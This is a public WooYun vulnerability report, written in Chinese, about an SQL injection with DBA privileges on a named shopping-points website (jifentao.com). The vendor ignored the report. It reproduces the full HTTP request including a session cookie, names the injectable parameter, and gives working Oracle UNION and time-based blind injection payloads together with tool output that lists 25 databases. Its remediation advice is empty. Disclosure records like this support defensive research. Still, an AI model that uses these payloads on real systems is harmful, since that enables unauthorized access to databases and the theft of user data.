当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116822

漏洞标题:积分淘SQL注入(DBA权限)

相关厂商:jifentao.com

漏洞作者: null_z

提交时间:2015-05-29 11:51

修复时间:2015-06-03 11:52

公开时间:2015-06-03 11:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-29: 细节已通知厂商并且等待厂商处理中
2015-06-03: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

~~~

详细说明:

注入地址http://wine.jifentao.com/sjyouhui/?i=8C7FFB279D1C45BD9112EE1835B46E60
数据包

POST /shangjia/ShangjiaAction.do?method=getShopBrandList& HTTP/1.1
Host: wine.jifentao.com
Proxy-Connection: keep-alive
Content-Length: 106
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://wine.jifentao.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://wine.jifentao.com/sjyouhui/?i=8C7FFB279D1C45BD9112EE1835B46E60
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4
Cookie: JSESSIONID=8A3EA7E51C5494C143458872EE67350E
start=0&limit=24&param=null&pSptId=2070221F788545BA982ADFADF2DCD5FC&zhichi=12&searchshopName=12&showsite=XXHJF


可注入参数start

2015-05-28 21:37:17的屏幕截图.png

2015-05-28 21:37:27的屏幕截图.png

漏洞证明:

Parameter: start (POST)
Type: UNION query
Title: Generic UNION query (NULL) - 16 columns
Payload: start=0 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(122)||CHR(107)||CHR(120)||CHR(113)||CHR(121)||CHR(120)||CHR(88)||CHR(118)||CHR(71)||CHR(76)||CHR(112)||CHR(99)||CHR(80)||CHR(112)||CHR(113)||CHR(118)||CHR(106)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &limit=24&param=null&pSptId=2070221F788545BA982ADFADF2DCD5FC&zhichi=12&searchshopName=12&showsite=XXHJF
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: start=0 AND 6307=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(122)||CHR(115)||CHR(75),5)-- Pukn&limit=24&param=null&pSptId=2070221F788545BA982ADFADF2DCD5FC&zhichi=12&searchshopName=12&showsite=XXHJF
---
back-end DBMS: Oracle
current user is DBA: True
available databases [25]:
[*] CHAYE
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] JIFEN
[*] MDSYS
[*] NEWSHOP
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SHOP
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] ZBY

修复方案:

你们更专业

版权声明:转载请注明来源 null_z@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-03 11:52

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无